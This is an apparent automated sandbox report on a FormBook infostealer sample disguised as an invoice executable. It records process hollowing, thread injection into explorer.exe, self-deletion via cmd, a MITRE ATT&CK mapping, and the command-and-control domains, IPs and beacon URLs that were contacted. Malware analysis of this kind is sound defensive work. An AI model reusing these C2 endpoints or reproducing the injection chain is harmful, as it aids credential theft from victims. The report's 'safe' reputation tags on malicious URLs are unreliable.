          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]8_2_03771DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]8_2_03771DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037735A1 mov eax, dword ptr fs:[00000030h]8_2_037735A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]8_2_0377FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FD9B mov eax, dword ptr fs:[00000030h]8_2_0377FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772581 mov eax, dword ptr fs:[00000030h]8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]8_2_03742D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]8_2_03742D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]8_2_03742D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03742D8A mov eax, dword ptr fs:[00000030h]8_2_03742D8A
          Source: C:\Users\user\Desktop\INV74321.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.aqayeseo.com
          Source: C:\Windows\explorer.exeDomain query: www.downtoearthwork.com
          Source: C:\Windows\explorer.exeDomain query: www.shebagholdings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.126 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.booweats.com
          Source: C:\Windows\explorer.exeDomain query: www.0o-a-8v4l76.net
          Source: C:\Windows\explorer.exeDomain query: www.topcasino-111.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.46.55 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lingoblasterdiscount.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.84.101.247 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.smartmatch-dating-api.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xn--espacesacr-k7a.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.king-jackpot.com
          Source: C:\Windows\explorer.exeNetwork Connect: 87.98.148.38 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 163.43.122.109 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Users\user\Desktop\INV74321.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INV74321.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\INV74321.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: D90000Jump to behavior
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000002.473046481.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411840 Sample: INV74321.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.cylindberg.com 2->31 33 www.painteredmond.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 INV74321.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\q7pl.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 INV74321.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.0o-a-8v4l76.net 163.43.122.109, 49733, 80 SAKURA-BSAKURAInternetIncJP Japan 18->35 37 king-jackpot.com 119.18.54.126, 49727, 80 PUBLIC-DOMAIN-REGISTRYUS India 18->37 39 10 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INV74321.exe30%VirustotalBrowse
          INV74321.exe18%MetadefenderBrowse
          INV74321.exe72%ReversingLabsWin32.Trojan.SpyNoon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll26%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll55%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.INV74321.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.INV74321.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.INV74321.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.wlanext.exe.3ce7960.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.INV74321.exe.29a0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.INV74321.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.INV74321.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.downtoearthwork.com0%VirustotalBrowse
          www.shebagholdings.com0%VirustotalBrowse
          www.booweats.com0%VirustotalBrowse
          www.0o-a-8v4l76.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.topcasino-111.com/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.king-jackpot.com/or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH0%Avira URL Cloudsafe
          http://www.booweats.com/or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.0o-a-8v4l76.net/or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.shebagholdings.com/or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.xn--espacesacr-k7a.com/or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh0%Avira URL Cloudsafe
          www.nobleandmarble.com/or4i/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.downtoearthwork.com
          		104.21.46.55
          		truetrueunknown
          www.shebagholdings.com
          		154.84.101.247
          		truetrueunknown
          www.booweats.com
          		64.190.62.111
          		truetrueunknown
          www.0o-a-8v4l76.net
          		163.43.122.109
          		truetrueunknown
          www.topcasino-111.com
          		87.98.148.38
          		truetrue
            		unknown
            xn--espacesacr-k7a.com
            		34.102.136.180
            		truefalse
              		unknown
              www.painteredmond.com
              		192.185.0.218
              		truefalse
                		unknown
                king-jackpot.com
                		119.18.54.126
                		truetrue
                  		unknown
                  www.aqayeseo.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.smartmatch-dating-api.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.xn--espacesacr-k7a.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.king-jackpot.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.cylindberg.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.lingoblasterdiscount.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.topcasino-111.com/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfHtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfHtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.king-jackpot.com/or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfHtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.booweats.com/or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfHtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.0o-a-8v4l76.net/or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfntrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.shebagholdings.com/or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+Ntrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.xn--espacesacr-k7a.com/or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWhfalse
                              • Avira URL Cloud: safe
                              		unknown
                              www.nobleandmarble.com/or4i/true
                              • Avira URL Cloud: safe
                              		low

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_landewlanext.exe, 00000008.00000002.475299853.0000000003E62000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.tiro.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrorINV74321.exefalse
                                              		high
                                              http://www.goodfont.co.krexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netDexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://fontfabrik.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorINV74321.exefalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fonts.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.sandoll.co.krexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        154.84.101.247
                                                        		www.shebagholdings.comSeychelles
                                                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                        119.18.54.126
                                                        		king-jackpot.comIndia
                                                        		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                        34.102.136.180
                                                        		xn--espacesacr-k7a.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        64.190.62.111
                                                        		www.booweats.comUnited States
                                                        		11696NBS11696UStrue
                                                        104.21.46.55
                                                        		www.downtoearthwork.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        87.98.148.38
                                                        		www.topcasino-111.comFrance
                                                        		16276OVHFRtrue
                                                        163.43.122.109
                                                        		www.0o-a-8v4l76.netJapan9370SAKURA-BSAKURAInternetIncJPtrue

                                                        General Information

                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                        Analysis ID:411840
                                                        Start date:12.05.2021
                                                        Start time:07:34:19
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 36s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:INV74321.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:30
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@7/3@16/7
                                                        EGA Information:Failed
                                                        HDC Information:
